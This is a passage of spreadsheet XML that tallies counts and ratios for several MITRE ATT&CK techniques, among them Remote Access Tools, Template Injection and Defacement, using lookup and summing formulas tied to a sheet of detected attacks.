      <c r="S43" s="292">
        <v>3</v>
      </c>
      <c r="T43" s="322">
        <v>3</v>
      </c>
      <c r="U43" s="322">
        <v>0</v>
      </c>
      <c r="V43" s="12">
        <v>3</v>
      </c>
      <c r="W43" s="13">
        <v>1</v>
      </c>
      <c r="X43" s="394">
        <v>1</v>
      </c>
      <c r="Y43" s="392">
        <v>3</v>
      </c>
      <c r="Z43" s="392">
        <v>3</v>
      </c>
      <c r="AA43" s="322">
        <v>0</v>
      </c>
      <c r="AB43" s="392">
        <v>3</v>
      </c>
      <c r="AC43" s="16">
        <v>1</v>
      </c>
      <c r="AD43" s="394">
        <v>1</v>
      </c>
      <c r="AE43" s="392">
        <v>2</v>
      </c>
      <c r="AF43" s="392">
        <v>2</v>
      </c>
      <c r="AG43" s="322">
        <v>0</v>
      </c>
      <c r="AH43" s="392">
        <v>1</v>
      </c>
      <c r="AI43" s="16">
        <v>1</v>
      </c>
      <c r="AJ43" s="394">
        <v>2</v>
      </c>
      <c r="AK43" s="392">
        <v>5</v>
      </c>
      <c r="AL43" s="392">
        <v>5</v>
      </c>
      <c r="AM43" s="322">
        <v>0</v>
      </c>
      <c r="AN43" s="392">
        <v>4</v>
      </c>
      <c r="AO43" s="16">
        <v>1</v>
      </c>
      <c r="AP43" s="394">
        <v>2</v>
      </c>
      <c r="AQ43" s="292">
        <v>0</v>
      </c>
      <c r="AR43" s="322">
        <v>0</v>
      </c>
      <c r="AS43" s="322">
        <v>0</v>
      </c>
      <c r="AT43" s="12">
        <v>0</v>
      </c>
      <c r="AU43" s="13">
        <v>0</v>
      </c>
      <c r="AV43" s="394">
        <v>0</v>
      </c>
      <c r="AW43" s="392">
        <v>0</v>
      </c>
      <c r="AX43" s="392">
        <v>0</v>
      </c>
      <c r="AY43" s="322">
        <v>0</v>
      </c>
      <c r="AZ43" s="4">
        <v>0</v>
      </c>
      <c r="BA43" s="16">
        <v>0</v>
      </c>
      <c r="BB43" s="394">
        <v>0</v>
      </c>
      <c r="BC43" s="292">
        <v>3</v>
      </c>
      <c r="BD43" s="322">
        <v>3</v>
      </c>
      <c r="BE43" s="322">
        <v>0</v>
      </c>
      <c r="BF43" s="12">
        <v>3</v>
      </c>
      <c r="BG43" s="13">
        <v>1</v>
      </c>
      <c r="BH43" s="394">
        <v>1</v>
      </c>
      <c r="BI43" s="292">
        <v>0</v>
      </c>
      <c r="BJ43" s="322">
        <v>0</v>
      </c>
      <c r="BK43" s="322">
        <v>0</v>
      </c>
      <c r="BL43" s="12">
        <v>0</v>
      </c>
      <c r="BM43" s="13">
        <v>0</v>
      </c>
      <c r="BN43" s="394">
        <v>0</v>
      </c>
      <c r="BO43" s="292">
        <v>2</v>
      </c>
      <c r="BP43" s="322">
        <v>2</v>
      </c>
      <c r="BQ43" s="322">
        <v>0</v>
      </c>
      <c r="BR43" s="12">
        <v>0</v>
      </c>
      <c r="BS43" s="12">
        <v>2</v>
      </c>
      <c r="BT43" s="13">
        <v>1</v>
      </c>
      <c r="BU43" s="394">
        <v>2</v>
      </c>
      <c r="BV43" s="292">
        <v>0</v>
      </c>
      <c r="BW43" s="322">
        <v>0</v>
      </c>
      <c r="BX43" s="322">
        <v>0</v>
      </c>
      <c r="BY43" s="12">
        <v>0</v>
      </c>
      <c r="BZ43" s="13">
        <v>0</v>
      </c>
      <c r="CA43" s="394">
        <v>0</v>
      </c>
      <c r="CB43" s="292">
        <v>1</v>
      </c>
      <c r="CC43" s="322">
        <v>1</v>
      </c>
      <c r="CD43" s="322">
        <v>0</v>
      </c>
      <c r="CE43" s="12">
        <v>0</v>
      </c>
      <c r="CF43" s="12">
        <v>1</v>
      </c>
      <c r="CG43" s="13">
        <v>1</v>
      </c>
      <c r="CH43" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:86" ht="15" customHeight="1">
      <c r="A44" s="4">
        <f t="shared" si="0"/>
        <v>42</v>
      </c>
      <c r="B44" s="4" t="str">
        <f>IFERROR(VLOOKUP(A44,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1219</v>
      </c>
      <c r="C44" s="493" t="str">
        <f>IFERROR(VLOOKUP(B44,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Access Tools</v>
      </c>
      <c r="D44" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B44)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E44" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>147</v>
      </c>
      <c r="F44" s="579" t="str">
        <f t="shared" si="1"/>
        <v>2 (147)</v>
      </c>
      <c r="G44" s="292">
        <v>114</v>
      </c>
      <c r="H44" s="322">
        <v>83</v>
      </c>
      <c r="I44" s="322">
        <v>0</v>
      </c>
      <c r="J44" s="12">
        <v>5</v>
      </c>
      <c r="K44" s="13">
        <v>0.5</v>
      </c>
      <c r="L44" s="394">
        <v>27</v>
      </c>
      <c r="M44" s="322">
        <v>0</v>
      </c>
      <c r="N44" s="322">
        <v>0</v>
      </c>
      <c r="O44" s="322">
        <v>0</v>
      </c>
      <c r="P44" s="12">
        <v>0</v>
      </c>
      <c r="Q44" s="13">
        <v>0</v>
      </c>
      <c r="R44" s="394">
        <v>0</v>
      </c>
      <c r="S44" s="292">
        <v>114</v>
      </c>
      <c r="T44" s="322">
        <v>83</v>
      </c>
      <c r="U44" s="322">
        <v>0</v>
      </c>
      <c r="V44" s="12">
        <v>5</v>
      </c>
      <c r="W44" s="13">
        <v>0.5</v>
      </c>
      <c r="X44" s="394">
        <v>27</v>
      </c>
      <c r="Y44" s="392">
        <v>159</v>
      </c>
      <c r="Z44" s="392">
        <v>114</v>
      </c>
      <c r="AA44" s="322">
        <v>0</v>
      </c>
      <c r="AB44" s="392">
        <v>10</v>
      </c>
      <c r="AC44" s="16">
        <v>0.5</v>
      </c>
      <c r="AD44" s="394">
        <v>50</v>
      </c>
      <c r="AE44" s="392">
        <v>36</v>
      </c>
      <c r="AF44" s="392">
        <v>36</v>
      </c>
      <c r="AG44" s="322">
        <v>0</v>
      </c>
      <c r="AH44" s="392">
        <v>5</v>
      </c>
      <c r="AI44" s="16">
        <v>1</v>
      </c>
      <c r="AJ44" s="394">
        <v>32</v>
      </c>
      <c r="AK44" s="392">
        <v>195</v>
      </c>
      <c r="AL44" s="392">
        <v>150</v>
      </c>
      <c r="AM44" s="322">
        <v>0</v>
      </c>
      <c r="AN44" s="392">
        <v>15</v>
      </c>
      <c r="AO44" s="16">
        <v>1</v>
      </c>
      <c r="AP44" s="394">
        <v>64</v>
      </c>
      <c r="AQ44" s="292">
        <v>0</v>
      </c>
      <c r="AR44" s="322">
        <v>0</v>
      </c>
      <c r="AS44" s="322">
        <v>0</v>
      </c>
      <c r="AT44" s="12">
        <v>0</v>
      </c>
      <c r="AU44" s="13">
        <v>0</v>
      </c>
      <c r="AV44" s="394">
        <v>0</v>
      </c>
      <c r="AW44" s="392">
        <v>1</v>
      </c>
      <c r="AX44" s="392">
        <v>1</v>
      </c>
      <c r="AY44" s="322">
        <v>0</v>
      </c>
      <c r="AZ44" s="4">
        <v>1</v>
      </c>
      <c r="BA44" s="16">
        <v>0.5</v>
      </c>
      <c r="BB44" s="394">
        <v>1</v>
      </c>
      <c r="BC44" s="292">
        <v>115</v>
      </c>
      <c r="BD44" s="322">
        <v>84</v>
      </c>
      <c r="BE44" s="322">
        <v>0</v>
      </c>
      <c r="BF44" s="12">
        <v>6</v>
      </c>
      <c r="BG44" s="13">
        <v>0.5</v>
      </c>
      <c r="BH44" s="394">
        <v>28</v>
      </c>
      <c r="BI44" s="292">
        <v>34</v>
      </c>
      <c r="BJ44" s="322">
        <v>33</v>
      </c>
      <c r="BK44" s="322">
        <v>0</v>
      </c>
      <c r="BL44" s="12">
        <v>2</v>
      </c>
      <c r="BM44" s="13">
        <v>0.5</v>
      </c>
      <c r="BN44" s="394">
        <v>32</v>
      </c>
      <c r="BO44" s="292">
        <v>176</v>
      </c>
      <c r="BP44" s="322">
        <v>175</v>
      </c>
      <c r="BQ44" s="322">
        <v>0</v>
      </c>
      <c r="BR44" s="12">
        <v>2</v>
      </c>
      <c r="BS44" s="12">
        <v>6</v>
      </c>
      <c r="BT44" s="13">
        <v>1</v>
      </c>
      <c r="BU44" s="394">
        <v>146</v>
      </c>
      <c r="BV44" s="292">
        <v>0</v>
      </c>
      <c r="BW44" s="322">
        <v>0</v>
      </c>
      <c r="BX44" s="322">
        <v>0</v>
      </c>
      <c r="BY44" s="12">
        <v>0</v>
      </c>
      <c r="BZ44" s="13">
        <v>0</v>
      </c>
      <c r="CA44" s="394">
        <v>0</v>
      </c>
      <c r="CB44" s="292">
        <v>7</v>
      </c>
      <c r="CC44" s="322">
        <v>4</v>
      </c>
      <c r="CD44" s="322">
        <v>0</v>
      </c>
      <c r="CE44" s="12">
        <v>0</v>
      </c>
      <c r="CF44" s="12">
        <v>1</v>
      </c>
      <c r="CG44" s="13">
        <v>0.5</v>
      </c>
      <c r="CH44" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="45" spans="1:86" ht="15" customHeight="1">
      <c r="A45" s="4">
        <f t="shared" si="0"/>
        <v>43</v>
      </c>
      <c r="B45" s="4" t="str">
        <f>IFERROR(VLOOKUP(A45,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1221</v>
      </c>
      <c r="C45" s="493" t="str">
        <f>IFERROR(VLOOKUP(B45,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Template Injection</v>
      </c>
      <c r="D45" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B45)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E45" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>16</v>
      </c>
      <c r="F45" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (16)</v>
      </c>
      <c r="G45" s="292">
        <v>1</v>
      </c>
      <c r="H45" s="322">
        <v>1</v>
      </c>
      <c r="I45" s="322">
        <v>0</v>
      </c>
      <c r="J45" s="12">
        <v>1</v>
      </c>
      <c r="K45" s="13">
        <v>1</v>
      </c>
      <c r="L45" s="394">
        <v>1</v>
      </c>
      <c r="M45" s="322">
        <v>5</v>
      </c>
      <c r="N45" s="322">
        <v>5</v>
      </c>
      <c r="O45" s="322">
        <v>0</v>
      </c>
      <c r="P45" s="12">
        <v>5</v>
      </c>
      <c r="Q45" s="13">
        <v>1</v>
      </c>
      <c r="R45" s="394">
        <v>4</v>
      </c>
      <c r="S45" s="292">
        <v>6</v>
      </c>
      <c r="T45" s="322">
        <v>6</v>
      </c>
      <c r="U45" s="322">
        <v>0</v>
      </c>
      <c r="V45" s="12">
        <v>6</v>
      </c>
      <c r="W45" s="13">
        <v>1</v>
      </c>
      <c r="X45" s="394">
        <v>4</v>
      </c>
      <c r="Y45" s="392">
        <v>16</v>
      </c>
      <c r="Z45" s="392">
        <v>11</v>
      </c>
      <c r="AA45" s="322">
        <v>0</v>
      </c>
      <c r="AB45" s="392">
        <v>6</v>
      </c>
      <c r="AC45" s="16">
        <v>1</v>
      </c>
      <c r="AD45" s="394">
        <v>9</v>
      </c>
      <c r="AE45" s="392">
        <v>21</v>
      </c>
      <c r="AF45" s="392">
        <v>15</v>
      </c>
      <c r="AG45" s="322">
        <v>0</v>
      </c>
      <c r="AH45" s="392">
        <v>13</v>
      </c>
      <c r="AI45" s="16">
        <v>1</v>
      </c>
      <c r="AJ45" s="394">
        <v>7</v>
      </c>
      <c r="AK45" s="392">
        <v>37</v>
      </c>
      <c r="AL45" s="392">
        <v>26</v>
      </c>
      <c r="AM45" s="322">
        <v>0</v>
      </c>
      <c r="AN45" s="392">
        <v>19</v>
      </c>
      <c r="AO45" s="16">
        <v>1</v>
      </c>
      <c r="AP45" s="394">
        <v>10</v>
      </c>
      <c r="AQ45" s="292">
        <v>0</v>
      </c>
      <c r="AR45" s="322">
        <v>0</v>
      </c>
      <c r="AS45" s="322">
        <v>0</v>
      </c>
      <c r="AT45" s="12">
        <v>0</v>
      </c>
      <c r="AU45" s="13">
        <v>0</v>
      </c>
      <c r="AV45" s="394">
        <v>0</v>
      </c>
      <c r="AW45" s="392">
        <v>8</v>
      </c>
      <c r="AX45" s="392">
        <v>3</v>
      </c>
      <c r="AY45" s="322">
        <v>0</v>
      </c>
      <c r="AZ45" s="4">
        <v>3</v>
      </c>
      <c r="BA45" s="16">
        <v>1</v>
      </c>
      <c r="BB45" s="394">
        <v>3</v>
      </c>
      <c r="BC45" s="292">
        <v>14</v>
      </c>
      <c r="BD45" s="322">
        <v>9</v>
      </c>
      <c r="BE45" s="322">
        <v>0</v>
      </c>
      <c r="BF45" s="12">
        <v>9</v>
      </c>
      <c r="BG45" s="13">
        <v>1</v>
      </c>
      <c r="BH45" s="394">
        <v>7</v>
      </c>
      <c r="BI45" s="292">
        <v>2</v>
      </c>
      <c r="BJ45" s="322">
        <v>1</v>
      </c>
      <c r="BK45" s="322">
        <v>0</v>
      </c>
      <c r="BL45" s="12">
        <v>1</v>
      </c>
      <c r="BM45" s="13">
        <v>1</v>
      </c>
      <c r="BN45" s="394">
        <v>1</v>
      </c>
      <c r="BO45" s="292">
        <v>14</v>
      </c>
      <c r="BP45" s="322">
        <v>11</v>
      </c>
      <c r="BQ45" s="322">
        <v>0</v>
      </c>
      <c r="BR45" s="12">
        <v>1</v>
      </c>
      <c r="BS45" s="12">
        <v>6</v>
      </c>
      <c r="BT45" s="13">
        <v>1</v>
      </c>
      <c r="BU45" s="394">
        <v>11</v>
      </c>
      <c r="BV45" s="292">
        <v>0</v>
      </c>
      <c r="BW45" s="322">
        <v>0</v>
      </c>
      <c r="BX45" s="322">
        <v>0</v>
      </c>
      <c r="BY45" s="12">
        <v>0</v>
      </c>
      <c r="BZ45" s="13">
        <v>0</v>
      </c>
      <c r="CA45" s="394">
        <v>0</v>
      </c>
      <c r="CB45" s="292">
        <v>6</v>
      </c>
      <c r="CC45" s="322">
        <v>6</v>
      </c>
      <c r="CD45" s="322">
        <v>0</v>
      </c>
      <c r="CE45" s="12">
        <v>0</v>
      </c>
      <c r="CF45" s="12">
        <v>1</v>
      </c>
      <c r="CG45" s="13">
        <v>1</v>
      </c>
      <c r="CH45" s="394">
        <v>6</v>
      </c>
    </row>
    <row r="46" spans="1:86" ht="15" customHeight="1">
      <c r="A46" s="4">
        <f t="shared" si="0"/>
        <v>44</v>
      </c>
      <c r="B46" s="4" t="str">
        <f>IFERROR(VLOOKUP(A46,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1482</v>
      </c>
      <c r="C46" s="493" t="str">
        <f>IFERROR(VLOOKUP(B46,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="D46" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B46)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E46" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>4</v>
      </c>
      <c r="F46" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (4)</v>
      </c>
      <c r="G46" s="292">
        <v>2</v>
      </c>
      <c r="H46" s="322">
        <v>2</v>
      </c>
      <c r="I46" s="322">
        <v>0</v>
      </c>
      <c r="J46" s="12">
        <v>2</v>
      </c>
      <c r="K46" s="13">
        <v>1</v>
      </c>
      <c r="L46" s="394">
        <v>1</v>
      </c>
      <c r="M46" s="322">
        <v>0</v>
      </c>
      <c r="N46" s="322">
        <v>0</v>
      </c>
      <c r="O46" s="322">
        <v>0</v>
      </c>
      <c r="P46" s="12">
        <v>0</v>
      </c>
      <c r="Q46" s="13">
        <v>0</v>
      </c>
      <c r="R46" s="394">
        <v>0</v>
      </c>
      <c r="S46" s="292">
        <v>2</v>
      </c>
      <c r="T46" s="322">
        <v>2</v>
      </c>
      <c r="U46" s="322">
        <v>0</v>
      </c>
      <c r="V46" s="12">
        <v>2</v>
      </c>
      <c r="W46" s="13">
        <v>1</v>
      </c>
      <c r="X46" s="394">
        <v>1</v>
      </c>
      <c r="Y46" s="392">
        <v>5</v>
      </c>
      <c r="Z46" s="392">
        <v>4</v>
      </c>
      <c r="AA46" s="322">
        <v>0</v>
      </c>
      <c r="AB46" s="392">
        <v>3</v>
      </c>
      <c r="AC46" s="16">
        <v>1</v>
      </c>
      <c r="AD46" s="394">
        <v>3</v>
      </c>
      <c r="AE46" s="392">
        <v>4</v>
      </c>
      <c r="AF46" s="392">
        <v>2</v>
      </c>
      <c r="AG46" s="322">
        <v>0</v>
      </c>
      <c r="AH46" s="392">
        <v>2</v>
      </c>
      <c r="AI46" s="16">
        <v>1</v>
      </c>
      <c r="AJ46" s="394">
        <v>1</v>
      </c>
      <c r="AK46" s="392">
        <v>9</v>
      </c>
      <c r="AL46" s="392">
        <v>6</v>
      </c>
      <c r="AM46" s="322">
        <v>0</v>
      </c>
      <c r="AN46" s="392">
        <v>5</v>
      </c>
      <c r="AO46" s="16">
        <v>1</v>
      </c>
      <c r="AP46" s="394">
        <v>3</v>
      </c>
      <c r="AQ46" s="292">
        <v>0</v>
      </c>
      <c r="AR46" s="322">
        <v>0</v>
      </c>
      <c r="AS46" s="322">
        <v>0</v>
      </c>
      <c r="AT46" s="12">
        <v>0</v>
      </c>
      <c r="AU46" s="13">
        <v>0</v>
      </c>
      <c r="AV46" s="394">
        <v>0</v>
      </c>
      <c r="AW46" s="392">
        <v>0</v>
      </c>
      <c r="AX46" s="392">
        <v>0</v>
      </c>
      <c r="AY46" s="322">
        <v>0</v>
      </c>
      <c r="AZ46" s="4">
        <v>0</v>
      </c>
      <c r="BA46" s="16">
        <v>0</v>
      </c>
      <c r="BB46" s="394">
        <v>0</v>
      </c>
      <c r="BC46" s="292">
        <v>2</v>
      </c>
      <c r="BD46" s="322">
        <v>2</v>
      </c>
      <c r="BE46" s="322">
        <v>0</v>
      </c>
      <c r="BF46" s="12">
        <v>2</v>
      </c>
      <c r="BG46" s="13">
        <v>1</v>
      </c>
      <c r="BH46" s="394">
        <v>1</v>
      </c>
      <c r="BI46" s="292">
        <v>0</v>
      </c>
      <c r="BJ46" s="322">
        <v>0</v>
      </c>
      <c r="BK46" s="322">
        <v>0</v>
      </c>
      <c r="BL46" s="12">
        <v>0</v>
      </c>
      <c r="BM46" s="13">
        <v>0</v>
      </c>
      <c r="BN46" s="394">
        <v>0</v>
      </c>
      <c r="BO46" s="292">
        <v>2</v>
      </c>
      <c r="BP46" s="322">
        <v>2</v>
      </c>
      <c r="BQ46" s="322">
        <v>0</v>
      </c>
      <c r="BR46" s="12">
        <v>0</v>
      </c>
      <c r="BS46" s="12">
        <v>2</v>
      </c>
      <c r="BT46" s="13">
        <v>1</v>
      </c>
      <c r="BU46" s="394">
        <v>2</v>
      </c>
      <c r="BV46" s="292">
        <v>0</v>
      </c>
      <c r="BW46" s="322">
        <v>0</v>
      </c>
      <c r="BX46" s="322">
        <v>0</v>
      </c>
      <c r="BY46" s="12">
        <v>0</v>
      </c>
      <c r="BZ46" s="13">
        <v>0</v>
      </c>
      <c r="CA46" s="394">
        <v>0</v>
      </c>
      <c r="CB46" s="292">
        <v>1</v>
      </c>
      <c r="CC46" s="322">
        <v>1</v>
      </c>
      <c r="CD46" s="322">
        <v>0</v>
      </c>
      <c r="CE46" s="12">
        <v>0</v>
      </c>
      <c r="CF46" s="12">
        <v>1</v>
      </c>
      <c r="CG46" s="13">
        <v>1</v>
      </c>
      <c r="CH46" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:86" ht="15" customHeight="1">
      <c r="A47" s="4">
        <f t="shared" si="0"/>
        <v>45</v>
      </c>
      <c r="B47" s="4" t="str">
        <f>IFERROR(VLOOKUP(A47,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1491</v>
      </c>
      <c r="C47" s="493" t="str">
        <f>IFERROR(VLOOKUP(B47,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Defacement</v>
      </c>
      <c r="D47" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B47)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E47" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F47" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (12)</v>
      </c>
      <c r="G47" s="292">
        <v>5</v>
      </c>
      <c r="H47" s="322">
        <v>1</v>
      </c>
      <c r="I47" s="322">
        <v>0</v>
      </c>
      <c r="J47" s="12">
        <v>1</v>
      </c>
      <c r="K47" s="13">
        <v>1</v>
      </c>
      <c r="L47" s="394">
        <v>1</v>
      </c>
      <c r="M47" s="322">
        <v>2</v>
      </c>
      <c r="N47" s="322">
        <v>2</v>
      </c>
      <c r="O47" s="322">
        <v>0</v>
      </c>
      <c r="P47" s="12">
        <v>2</v>
      </c>
      <c r="Q47" s="13">
        <v>1</v>
      </c>
      <c r="R47" s="394">
        <v>1</v>
      </c>
      <c r="S47" s="292">
        <v>7</v>
      </c>
      <c r="T47" s="322">
        <v>3</v>
      </c>
      <c r="U47" s="322">
        <v>0</v>
      </c>
      <c r="V47" s="12">
        <v>3</v>
      </c>
      <c r="W47" s="13">
        <v>1</v>
      </c>
      <c r="X47" s="394">
        <v>1</v>
      </c>
      <c r="Y47" s="392">
        <v>18</v>
      </c>
      <c r="Z47" s="392">
        <v>5</v>
      </c>
      <c r="AA47" s="322">
        <v>0</v>
      </c>
      <c r="AB47" s="392">
        <v>3</v>
      </c>
      <c r="AC47" s="16">
        <v>1</v>
      </c>
      <c r="AD47" s="394">
        <v>4</v>
      </c>
      <c r="AE47" s="392">
        <v>7</v>
      </c>
      <c r="AF47" s="392">
        <v>5</v>
      </c>
      <c r="AG47" s="322">
        <v>0</v>
      </c>
      <c r="AH47" s="392">
        <v>5</v>
      </c>
      <c r="AI47" s="16">
        <v>1</v>
      </c>
      <c r="AJ47" s="394">
        <v>1</v>
      </c>
      <c r="AK47" s="392">
        <v>25</v>
      </c>
      <c r="AL47" s="392">
        <v>10</v>
      </c>
      <c r="AM47" s="322">
        <v>0</v>
      </c>
      <c r="AN47" s="392">
        <v>8</v>
      </c>
      <c r="AO47" s="16">
        <v>1</v>
      </c>
      <c r="AP47" s="394">
        <v>4</v>
      </c>
      <c r="AQ47" s="292">
        <v>0</v>
      </c>
      <c r="AR47" s="322">
        <v>0</v>
      </c>
      <c r="AS47" s="322">
        <v>0</v>
      </c>
      <c r="AT47" s="12">
        <v>0</v>
      </c>
      <c r="AU47" s="13">
        <v>0</v>
      </c>
      <c r="AV47" s="394">
        <v>0</v>
      </c>
      <c r="AW47" s="392">
        <v>12</v>
      </c>
      <c r="AX47" s="392">
        <v>3</v>
      </c>
      <c r="AY47" s="322">
        <v>0</v>
      </c>
      <c r="AZ47" s="4">
        <v>1</v>
      </c>
      <c r="BA47" s="16">
        <v>1</v>
      </c>
      <c r="BB47" s="394">
        <v>3</v>
      </c>
      <c r="BC47" s="292">
        <v>19</v>
      </c>
      <c r="BD47" s="322">
        <v>6</v>
      </c>
      <c r="BE47" s="322">
        <v>0</v>
      </c>
      <c r="BF47" s="12">
        <v>4</v>
      </c>
      <c r="BG47" s="13">
        <v>1</v>
      </c>
      <c r="BH47" s="394">
        <v>4</v>
      </c>
      <c r="BI47" s="292">
        <v>3</v>
      </c>
      <c r="BJ47" s="322">
        <v>2</v>
      </c>
      <c r="BK47" s="322">
        <v>0</v>
      </c>
      <c r="BL47" s="12">
        <v>2</v>
      </c>
      <c r="BM47" s="13">
        <v>1</v>
      </c>
      <c r="BN47" s="394">
        <v>1</v>
      </c>
      <c r="BO47" s="292">
        <v>10</v>
      </c>
      <c r="BP47" s="322">
        <v>9</v>
      </c>
      <c r="BQ47" s="322">
        <v>0</v>
      </c>
      <c r="BR47" s="12">
        <v>2</v>
      </c>
      <c r="BS47" s="12">
        <v>4</v>
      </c>
      <c r="BT47" s="13">
        <v>1</v>
      </c>
      <c r="BU47" s="394">
        <v>8</v>
      </c>
      <c r="BV47" s="292">
        <v>0</v>
      </c>
      <c r="BW47" s="322">
        <v>0</v>
      </c>
      <c r="BX47" s="322">
        <v>0</v>
      </c>
      <c r="BY47" s="12">
        <v>0</v>
      </c>
      <c r="BZ47" s="13">
        <v>0</v>
      </c>
      <c r="CA47" s="394">
        <v>0</v>
      </c>
      <c r="CB47" s="292">
        <v>0</v>
      </c>
      <c r="CC47" s="322">
        <v>0</v>
      </c>
      <c r="CD47" s="322">
        <v>0</v>
      </c>
      <c r="CE47" s="12">
        <v>0</v>
      </c>
      <c r="CF47" s="12">
        <v>0</v>
      </c>
      <c r="CG47" s="13">
        <v>0</v>
      </c>
      <c r="CH47" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:86" ht="15" customHeight="1">
      <c r="A48" s="4">
        <f t="shared" si="0"/>
        <v>46</v>
      </c>
      <c r="B48" s="4" t="str">
        <f>IFERROR(VLOOKUP(A48,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1496</v>
      </c>
      <c r="C48" s="493" t="str">
        <f>IFERROR(VLOOKUP(B48,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Resource Hijacking</v>
      </c>
      <c r="D48" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B48)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E48" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F48" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (12)</v>
      </c>
      <c r="G48" s="292">
        <v>6</v>
      </c>
      <c r="H48" s="322">
        <v>6</v>
      </c>
      <c r="I48" s="322">
        <v>0</v>
      </c>
      <c r="J48" s="12">
        <v>3</v>
      </c>
      <c r="K48" s="13">
        <v>1</v>
      </c>
      <c r="L48" s="394">
        <v>2</v>
      </c>
      <c r="M48" s="322">
        <v>0</v>
      </c>
      <c r="N48" s="322">
        <v>0</v>
      </c>
      <c r="O48" s="322">
        <v>0</v>
      </c>
      <c r="P48" s="12">
        <v>0</v>
      </c>
      <c r="Q48" s="13">
        <v>0</v>
      </c>
      <c r="R48" s="394">
        <v>0</v>
      </c>
      <c r="S48" s="292">
        <v>6</v>
      </c>
      <c r="T48" s="322">
        <v>6</v>
      </c>
      <c r="U48" s="322">
        <v>0</v>
      </c>
      <c r="V48" s="12">
        <v>3</v>
      </c>
      <c r="W48" s="13">
        <v>1</v>
      </c>
      <c r="X48" s="394">
        <v>2</v>
      </c>
      <c r="Y48" s="392">
        <v>8</v>
      </c>
      <c r="Z48" s="392">
        <v>8</v>
      </c>
      <c r="AA48" s="322">
        <v>0</v>
      </c>
      <c r="AB48" s="392">
        <v>4</v>
      </c>
      <c r="AC48" s="16">
        <v>1</v>
      </c>
      <c r="AD48" s="394">
        <v>4</v>
      </c>
      <c r="AE48" s="392">
        <v>6</v>
      </c>
      <c r="AF48" s="392">
        <v>4</v>
      </c>
      <c r="AG48" s="322">
        <v>0</v>
      </c>
      <c r="AH48" s="392">
        <v>2</v>
      </c>
      <c r="AI48" s="16">
        <v>1</v>
      </c>
      <c r="AJ48" s="394">
        <v>3</v>
      </c>
      <c r="AK48" s="392">
        <v>14</v>
      </c>
      <c r="AL48" s="392">
        <v>12</v>
      </c>
      <c r="AM48" s="322">
        <v>0</v>
      </c>
      <c r="AN48" s="392">
        <v>6</v>
      </c>
      <c r="AO48" s="16">
        <v>1</v>
      </c>
      <c r="AP48" s="394">
        <v>4</v>
      </c>
      <c r="AQ48" s="292">
        <v>0</v>
      </c>
      <c r="AR48" s="322">
        <v>0</v>
      </c>
      <c r="AS48" s="322">
        <v>0</v>
      </c>
      <c r="AT48" s="12">
        <v>0</v>
      </c>
      <c r="AU48" s="13">
        <v>0</v>
      </c>
      <c r="AV48" s="394">
        <v>0</v>
      </c>
      <c r="AW48" s="392">
        <v>2</v>
      </c>
      <c r="AX48" s="392">
        <v>2</v>
      </c>
      <c r="AY48" s="322">
        <v>0</v>
      </c>
      <c r="AZ48" s="4">
        <v>1</v>
      </c>
      <c r="BA48" s="16">
        <v>1</v>
      </c>
      <c r="BB48" s="394">
        <v>2</v>
      </c>
      <c r="BC48" s="292">
        <v>8</v>
      </c>
      <c r="BD48" s="322">
        <v>8</v>
      </c>
      <c r="BE48" s="322">
        <v>0</v>
      </c>
